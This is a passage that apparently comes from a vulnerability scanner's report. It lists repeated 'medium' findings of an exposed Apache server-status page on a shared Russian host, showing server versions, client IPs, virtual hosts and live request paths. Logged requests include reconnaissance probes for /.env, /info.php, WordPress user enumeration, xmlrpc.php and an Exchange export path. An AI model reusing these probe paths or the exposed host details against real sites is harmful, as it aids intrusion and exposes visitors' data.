      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqConnChildSlotClientVHostRequest
      
      0-456299470/433/993846W
      0.58000.010.6049508.65
      66.249.81.65taxigoroda.ru:8080GET /.well-known/traffic-advice HTTP/1.0
      
      1-456286140/323/994088W
      0.46000.07.9249980.66
      103.86.132.35jenny.linkpc.net:8080GET / HTTP/1.0
      
      2-45612910/262/987138_
      0.36050.05.4749705.63
      2.56.191.220next.run.place:8080GET /go.php?link=0 HTTP/1.0
      
      3-45616800/255/962930W
      0.341300.05.9748981.02
      185.240.102.28ldk-sokol.ru:8080POST /?mailpoet_router&endpoint=cron_daemon&action=run&data=eyJ
      
      4-456308420/408/962140W
      0.572500.010.0349158.15
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      5-456116300/1070/937666W
      1.52000.031.5746494.46
      137.184.162.65trustdefend.org:8080GET /server-status HTTP/1.0
      
      6-45653050/12/924497W
      0.012800.00.1245906.18
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      7-45624600/338/912028W
      0.44400.07.7345660.64
      78.107.252.54intelspro.ru:8080POST /gw/ HTTP/1.0
      
      8-456315770/195/892169_
      0.250790.06.1944445.28
      64.124.8.59mapsshop.ru:8080GET /karty_derevni_grigorovo_70762/ HTTP/1.0
      
      9-456288770/438/882887W
      0.56000.010.4345361.73
      193.233.39.251akbru.ru:8080GET /akkumulyatory/sebang-75d23kl-65-ach-op-580a HTTP/1.0
      
      10-45669350/48/870397_
      0.0504630.01.1743820.04
      136.243.228.197mintim.ru:8080GET /politsiya/ HTTP/1.0
      
      11-45639570/259/865181_
      0.330300.05.1344165.38
      95.24.73.244zworkstation.ru:8080GET /api.php/shop.product.getInfo?id=11466&access_token=ca0fe26
      
      12-456318730/183/820677_
      0.28000.015.6842268.52
      57.128.32.79jenny.linkpc.net:8080GET /ps/CoUNnq.js HTTP/1.0
      
      13-45654810/59/812435_
      0.0801020.04.5339615.33
      51.89.231.132hard.line.pm:8080GET / HTTP/1.0
      
      14-45674080/15/792847_
      0.02000.00.6939514.92
      178.19.226.53next.run.place:8080GET /ps/CoUNnq.js HTTP/1.0
      
      15-456-0/0/763205.
      0.176300.00.0038893.52
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      16-456-0/0/738558.
      0.00106840.00.0038206.23
      64.124.8.59mapsshop.ru:8080GET /vektornaja_karta_sela_sernovodsk_741616_Mapinfo.html HTTP/
      
      17-456319200/310/729126W
      0.42400.06.9037390.44
      78.107.252.54slashfocus.ru:8080POST /gw/ HTTP/1.0
      
      18-456-0/0/688438.
      0.119000.00.0034892.41
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      19-456245850/383/655917_
      0.520950.013.0533799.48
      72.14.201.33taxigoroda.ru:8080GET /makeevka/taksi-maxim-makeevka-dnr HTTP/1.0
      
      20-456-0/0/626350.
      0.136400.00.0031782.06
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      21-456-0/0/609172.
      0.328900.00.0030906.83
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      22-456-0/0/573910.
      0.078700.00.0029999.67
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      23-456-0/0/539518.
      0.272400.00.0027810.94
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      24-456-0/0/520046.
      0.329200.00.0026713.60
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      25-456-0/0/493983.
      0.2110300.00.0026015.46
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      26-456-0/0/471466.
      0.039600.00.0025872.57
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      27-456-0/0/442631.
      0.741900.00.0022809.97
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      28-456-0/0/418552.
      0.098400.00.0021871.18
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      29-456-0/0/404368.
      0.129100.00.0020732.86
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      30-456-0/0/380021.
      0.049500.00.0019076.28
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      31-456-0/0/370216.
      0.518800.00.0018916.24
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      32-456-0/0/343186.
      0.95000.00.0017666.99
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      33-456320000/261/314864_
      0.370220.06.0816929.25
      57.128.32.79jenny.linkpc.net:8080GET / HT
      Found on 2023-08-27 21:59
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e6a8eb42e6a8eb42a76e0071

      Apache Status
      
      Apache Server Status for www.trustdefend.org (via 127.0.0.1)
      
      Server Version: Apache/2.4.6 (CloudLinux) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
      Server MPM: prefork
      Server Built: Jun  9 2023 19:20:27
      
      Current Time: Saturday, 26-Aug-2023 19:36:55 MSK
      Restart Time: Friday, 18-Aug-2023 12:09:53 MSK
      Parent Server Config. Generation: 427
      Parent Server MPM Generation: 426
      Server uptime:  8 days 7 hours 27 minutes 2 seconds
      Server load: 5.99 7.09 7.72
      Total accesses: 27543515 - Total Traffic: 1399.0 GB
      CPU Usage: u47.62 s12.03 cu0 cs0 - .00831% CPU load
      38.4 requests/sec - 2.0 MB/second - 53.3 kB/request
      8 requests currently being processed, 9 idle workers
      W__W_W.WW_W_.W_._W._......_.....................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqConnChildSlotClientVHostRequest
      
      0-426159060/137/855576W
      0.20600.04.3043543.98
      20.15.240.81zimag.ru:8080GET /dekorativnoe-osveshchenie/svetodiodnyj-led-neon-flex-smd-s
      
      1-42690860/384/858993_
      0.63010.018.0244115.21
      5.180.241.154formy-i-blanki.ru:8080GET /wp-content/uploads/%D0%90%D1%80%D0%B5%D0%BD%D0%B4%D0%B0_%D
      
      2-426175410/110/845367_
      0.17000.03.5643448.03
      138.68.163.10trustdefend.org:8080GET /v2/_catalog HTTP/1.0
      
      3-426159670/91/827743W
      0.10000.02.7143506.02
      104.238.36.190kalitkatomsk.ru:8080POST /mezhkomnatnye-dveri/107-krona/175-laura-do-chernyj-triple
      
      4-426175900/115/831074_
      0.16000.03.6143400.02
      104.131.1.32womanwm.com:8080GET /?rest_route=/wp/v2/users/ HTTP/1.0
      
      5-426191270/43/806041W
      0.05000.01.4641240.79
      195.184.210.125formy-i-blanki.ru:8080GET /dogovor-arendy-kvartiry-skachat-obrazec HTTP/1.0
      
      6-426-0/0/797983.
      0.08800.00.0040478.81
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      7-426175910/67/780239W
      0.122600.01.7940160.34
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      8-426189030/29/764251W
      0.041200.00.9939071.73
      185.240.102.28ldk-sokol.ru:8080POST /?mailpoet_router&endpoint=cron_daemon&action=run&data=eyJ
      
      9-42694800/372/762154_
      0.60000.020.8039263.23
      67.198.118.13hard.line.pm:8080GET /ps/CoUNnq.js HTTP/1.0
      
      10-426124710/201/745069W
      0.305300.06.5338482.23
      185.240.102.28over-shop.ru:8080GET /index.php?route=extension/module/syncms/SyncImage&cron= HT
      
      11-426160610/213/741321_
      0.34000.05.7439034.11
      138.68.163.10trustdefend.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor
      
      12-426-0/0/701434.
      0.027700.00.0037555.48
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      13-426101280/270/695278W
      0.39000.06.9834923.04
      138.68.163.10trustdefend.org:8080GET /server-status HTTP/1.0
      
      14-426117580/353/677278_
      0.62010.013.2434979.05
      5.180.241.154formy-i-blanki.ru:8080GET /wp-content/uploads/%D0%90%D1%80%D0%B5%D0%BD%D0%B4%D0%B0_%D
      
      15-426-0/0/656679.
      1.567400.00.0034234.39
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      16-426150860/228/638611_
      0.370230.037.6534040.07
      61.42.161.4next.run.place:8080GET / HTTP/1.0
      
      17-426150870/120/625600W
      0.193600.04.3232860.08
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      18-426-0/0/589047.
      0.194800.00.0030811.80
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      19-426151610/107/562069_
      0.160210.03.1929890.00
      181.66.137.235next.run.place:8080GET / HTTP/1.0
      
      20-426-0/0/535310.
      0.2427000.00.0028232.71
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      21-426-0/0/522264.
      0.0227600.00.0027432.52
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      22-426-0/0/492562.
      0.1421700.00.0026769.16
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      23-426-0/0/467848.
      0.0127700.00.0024796.75
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      24-426-0/0/445282.
      0.1219200.00.0023670.05
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      25-426-0/0/429700.
      0.0327300.00.0023247.65
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      26-426252010/1069/410641_
      1.69000.038.3523215.78
      104.131.1.32womanwm.com:8080GET /info.php HTTP/1.0
      
      27-426-0/0/387269.
      0.604400.00.0020560.30
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      28-426-0/0/363957.
      1.2042900.00.0019813.43
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      29-426-0/0/355440.
      0.4958600.00.0018711.13
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      30-426-0/0/338069.
      0.0159600.00.0017352.69
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      31-426-0/0/326773.
      0.3261400.00.0017136.15
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      32-426-0/0/301764.
      0.0172600.00.0016042.78
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      33-426-0/0/279274.
      0.146510
      Found on 2023-08-26 16:36
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e6a8eb42e6a8eb42d1d42a65

      Apache Status
      
      Apache Server Status for www.trustdefend.org (via 127.0.0.1)
      
      Server Version: Apache/2.4.6 (CloudLinux) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
      Server MPM: prefork
      Server Built: Jun  9 2023 19:20:27
      
      Current Time: Friday, 25-Aug-2023 11:08:19 MSK
      Restart Time: Friday, 18-Aug-2023 12:09:53 MSK
      Parent Server Config. Generation: 383
      Parent Server MPM Generation: 382
      Server uptime:  6 days 22 hours 58 minutes 26 seconds
      Server load: 11.05 10.58 9.65
      Total accesses: 22953816 - Total Traffic: 1212.3 GB
      CPU Usage: u46.17 s11.59 cu0 cs0 - .00961% CPU load
      38.2 requests/sec - 2.1 MB/second - 55.4 kB/request
      23 requests currently being processed, 8 idle workers
      .W_W_W..WW____W.W_WWWWWWWWWWWW._.WW...W....W....................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqConnChildSlotClientVHostRequest
      
      0-382-0/0/661270.
      0.471000.00.0035854.48
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      1-382240870/10/661257W
      0.0135900.00.0636045.54
      23.105.238.220naviglon.ru:8080GET /vamshop-1c.php?wc1c=exchange?type=catalog&mode=import&file
      
      2-38282720/21/653171_
      0.02060.01.0535723.88
      178.176.73.104ds-hikvision.ru:8080GET /favicon.ico HTTP/1.0
      
      3-38245680/750/639976W
      1.33100.082.7335551.56
      185.240.102.28ldk-sokol.ru:8080POST /?mailpoet_router&endpoint=cron_daemon&action=run&data=eyJ
      
      4-38289370/43/638918_
      0.08000.01.9835855.47
      104.33.236.71next.run.place:8080GET /ps/NF67zq.js HTTP/1.0
      
      5-38241420/71/621923W
      0.1211000.05.0733605.90
      79.139.134.147naviglon.ru:8080GET /product_info.php?products_id=13256 HTTP/1.0
      
      6-382-0/0/620367.
      0.101300.00.0033514.94
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      7-382-0/0/604587.
      0.491400.00.0032949.83
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      8-38293490/69/596224W
      0.12600.010.2432235.55
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      9-38299060/2/594275W
      0.002100.00.0032366.69
      23.105.238.220naviglon.ru:8080GET /vamshop-1c.php?wc1c=exchange?type=catalog&mode=import&file
      
      10-38257300/134/576999_
      0.25060.06.9231618.14
      36.72.15.59hard.line.pm:8080GET /go.php?link=31 HTTP/1.0
      
      11-38294080/96/579259_
      0.160430.03.3232229.45
      154.47.16.207next.run.place:8080GET / HTTP/1.0
      
      12-38277930/162/549892_
      0.260740.014.7131193.14
      91.96.178.229jenny.linkpc.net:8080GET / HTTP/1.0
      
      13-38283160/185/543630_
      0.30000.06.4628890.38
      194.58.113.24blagovest-med.ru:8080GET / HTTP/1.0
      
      14-382264480/499/530331W
      0.83800.017.7129144.33
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      15-382-0/0/516849.
      0.25600.00.0028621.93
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      16-38283190/147/502774W
      0.24200.06.3028418.77
      66.249.76.34autosoren.ru:8080GET /novosti/v-chem-sekret-vaz%E2%88%922111-kotoryj-prodayut-za
      
      17-38294110/83/497483_
      0.1301960.02.8827313.79
      5.45.207.77mebozon.ru:8080GET /divany/kuhonnye-divany-i-ugolki/kuhonnyj-divan-atlas-velve
      
      18-38299390/56/466636W
      0.10100.05.7226028.59
      92.100.248.2vst-plugin.ru:8080GET /go/aHR0cHM6Ly9kaXNrLnlhbmRleC5ydS9pLy1fdjV5WlVteDVGZ1Vn HT
      
      19-38299400/6/449188W
      0.002000.00.1925147.37
      185.240.102.28ldk-sokol.ru:8080POST /?mailpoet_router&endpoint=cron_daemon&action=run&data=eyJ
      
      20-382265410/14/430480W
      0.0230400.00.3524073.18
      23.105.238.220naviglon.ru:8080GET /vamshop-1c.php?wc1c=exchange?type=catalog&mode=import&file
      
      21-38299980/38/418893W
      0.06000.01.7123294.21
      167.172.232.142trustdefend.org:8080GET /server-status HTTP/1.0
      
      22-382269330/66/402664W
      0.1224900.02.3022990.50
      23.105.238.220naviglon.ru:8080GET /vamshop-1c.php?wc1c=exchange?type=catalog&mode=import&file
      
      23-382191430/72/385053W
      0.1535600.010.9921354.37
      83.220.239.101naviglon.ru:8080GET /product_info.php?products_id=9924 HTTP/1.0
      
      24-38299990/46/372216W
      0.07100.02.0220733.06
      18.218.60.229seechov.ru:8080GET /.env HTTP/1.0
      
      25-382307970/8/359803W
      0.0023000.00.2420329.84
      46.8.57.214naviglon.ru:8080GET /product_info.php?products_id=2361 HTTP/1.0
      
      26-382100000/40/339350W
      0.06000.00.6820473.46
      185.240.102.28vst-plugin.ru:8080POST /wp-cron.php?doing_wp_cron=1692950898.70225405693054199218
      
      27-382307980/285/327823W
      0.482200.012.9518302.77
      213.180.203.223naviglon.ru:8080GET /product_info.php?products_id=5515 HTTP/1.0
      
      28-38221140/201/310973W
      0.397700.015.7516538.81
      23.105.238.220naviglon.ru:8080GET /vamshop-1c.php?wc1c=exchange?type=catalog&mode=import&file
      
      29-38221180/51/306576W
      0.0913900.01.0816656.01
      23.105.238.220naviglon.ru:8080GET /vamshop-1c.php?wc1c=exchange?type=catalog&mode=import&file
      
      30-382-0/0/292688.
      0.031200.00.0015425.83
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      31-382104430/57/282191_
      0.100130.01.78
      Found on 2023-08-25 08:08
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e6a8eb42e6a8eb42ec17ffc6

      Apache Status
      
      Apache Server Status for www.trustdefend.org (via 127.0.0.1)
      
      Server Version: Apache/2.4.6 (CloudLinux) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
      Server MPM: prefork
      Server Built: Jun  9 2023 19:20:27
      
      Current Time: Thursday, 24-Aug-2023 12:14:47 MSK
      Restart Time: Friday, 18-Aug-2023 12:09:53 MSK
      Parent Server Config. Generation: 346
      Parent Server MPM Generation: 345
      Server uptime:  6 days 4 minutes 54 seconds
      Server load: 9.35 8.82 8.42
      Total accesses: 19983232 - Total Traffic: 1057.2 GB
      CPU Usage: u43.36 s10.77 cu0 cs0 - .0104% CPU load
      38.5 requests/sec - 2.1 MB/second - 55.5 kB/request
      12 requests currently being processed, 14 idle workers
      WWW____W_WW_WWC___W__W__._W.....................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqConnChildSlotClientVHostRequest
      
      0-345319320/306/546460W
      0.583700.042.7729715.50
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      1-345243840/58/547971W
      0.0931300.035.1330035.90
      85.192.11.217ecomrussia.ru:8080GET /novosti/2020/mezhdunarodnyij-plas-forum-%c2%abretail-centr
      
      2-34571480/210/538836W
      0.36000.023.2529756.65
      178.128.151.41trustdefend.org:8080GET /server-status HTTP/1.0
      
      3-345104780/58/529750_
      0.11060.02.4229601.13
      37.212.3.193next.run.place:8080GET /go.php?link=1 HTTP/1.0
      
      4-34572500/17/526302_
      0.04060.051.5229939.82
      109.95.105.35ds-hikvision.ru:8080GET /favicon.ico HTTP/1.0
      
      5-345108440/42/515065_
      0.06070.01.2028150.63
      95.91.222.77jenny.linkpc.net:8080GET / HTTP/1.0
      
      6-34578390/98/514641_
      0.160140.03.7828113.18
      62.231.18.59ds-hikvision.ru:8080POST /metrika/sendInfo/ HTTP/1.0
      
      7-34580000/129/502499W
      0.211500.03.8227546.37
      78.107.252.54intelspro.ru:8080POST /gw/ HTTP/1.0
      
      8-345114290/10/492599_
      0.0101540.00.3026795.16
      144.91.106.14tiktok-recharge.com:8080GET / HTTP/1.0
      
      9-34587150/19/494847W
      0.034200.00.6127401.87
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      10-34597450/123/480047W
      0.18000.02.7226565.02
      77.82.66.75formy-i-blanki.ru:8080GET /froma-efs-1-skachat HTTP/1.0
      
      11-34591470/85/477153_
      0.12000.02.4526990.03
      178.128.151.41trustdefend.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor
      
      12-34524270/331/459728W
      0.58000.022.4726265.90
      54.202.164.45landing.today:8080GET / HTTP/1.0
      
      13-345114780/12/454571W
      0.01000.00.4024321.74
      46.183.9.10vivastudio.ru:8080POST /wp/xmlrpc.php HTTP/1.0
      
      14-34592481/133/446531C
      0.24000.35.2324502.50
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      15-34592500/121/429809_
      0.19080.03.6624202.18
      95.91.222.77jenny.linkpc.net:8080GET / HTTP/1.0
      
      16-345114810/16/424103_
      0.020130.00.1724150.87
      62.231.18.59ds-hikvision.ru:8080POST /metrika/sendInfo/ HTTP/1.0
      
      17-34564970/164/415679_
      0.27060.05.3023183.50
      109.95.105.35ds-hikvision.ru:8080GET /favicon.ico HTTP/1.0
      
      18-34597990/57/394985W
      0.081700.01.5221988.21
      185.240.102.28ldk-sokol.ru:8080POST /?mailpoet_router&endpoint=cron_daemon&action=run&data=eyJ
      
      19-34565000/242/381254_
      0.43050.017.0321398.44
      12.165.252.35jenny.linkpc.net:8080GET /go.php?link=0 HTTP/1.0
      
      20-34598000/76/365677_
      0.12080.01.9820602.19
      95.91.222.77jenny.linkpc.net:8080GET / HTTP/1.0
      
      21-34565040/238/360453W
      0.401200.016.6020031.27
      78.107.252.54slashfocus.ru:8080POST /gw/ HTTP/1.0
      
      22-345115390/5/344413_
      0.00070.00.2320037.18
      95.91.222.77jenny.linkpc.net:8080GET / HTTP/1.0
      
      23-345115400/4/330466_
      0.0002470.00.0818509.66
      87.76.58.186sosnovyibor.com:8080GET / HTTP/1.0
      
      24-345-0/0/319638.
      0.00000.00.0018001.96
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      25-345304540/348/310533_
      0.620810.013.2817689.53
      82.145.215.206gotoadm.ru:8080GET / HTTP/1.0
      
      26-345115420/4/295056W
      0.00000.00.1416549.02
      87.76.58.186sosnovyibor.com:8080GET / HTTP/1.0
      
      27-345-0/0/284397.
      0.0323100.00.0015990.48
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      28-345-0/0/270671.
      0.0919500.00.0014450.91
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      29-345-0/0/267747.
      0.0423200.00.0014539.83
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      30-345-0/0/257761.
      0.0322800.00.0013632.40
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      31-345-0/0/247899.
      0.528200.00.0013082.35
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      32-345-0/0/237377.
      0.1519700.00.0013136.50
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      33-345-0/0/220913.
      0.0286800.00.0012017.96
      127.0.0.1185.240.102.32:8080OPTIONS *
      Found on 2023-08-24 09:14
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e6a8eb42e6a8eb42887fea81

      Apache Status
      
      Apache Server Status for www.trustdefend.org (via 127.0.0.1)
      
      Server Version: Apache/2.4.6 (CloudLinux) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
      Server MPM: prefork
      Server Built: Jun  9 2023 19:20:27
      
      Current Time: Wednesday, 23-Aug-2023 06:20:51 MSK
      Restart Time: Friday, 18-Aug-2023 12:09:53 MSK
      Parent Server Config. Generation: 279
      Parent Server MPM Generation: 278
      Server uptime:  4 days 18 hours 10 minutes 57 seconds
      Server load: 6.30 6.82 7.07
      Total accesses: 15730020 - Total Traffic: 860.8 GB
      CPU Usage: u59.73 s16.11 cu0 cs0 - .0184% CPU load
      38.3 requests/sec - 2.1 MB/second - 57.4 kB/request
      11 requests currently being processed, 9 idle workers
      WW_W___W_WW._W_WW_WW.._.........................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
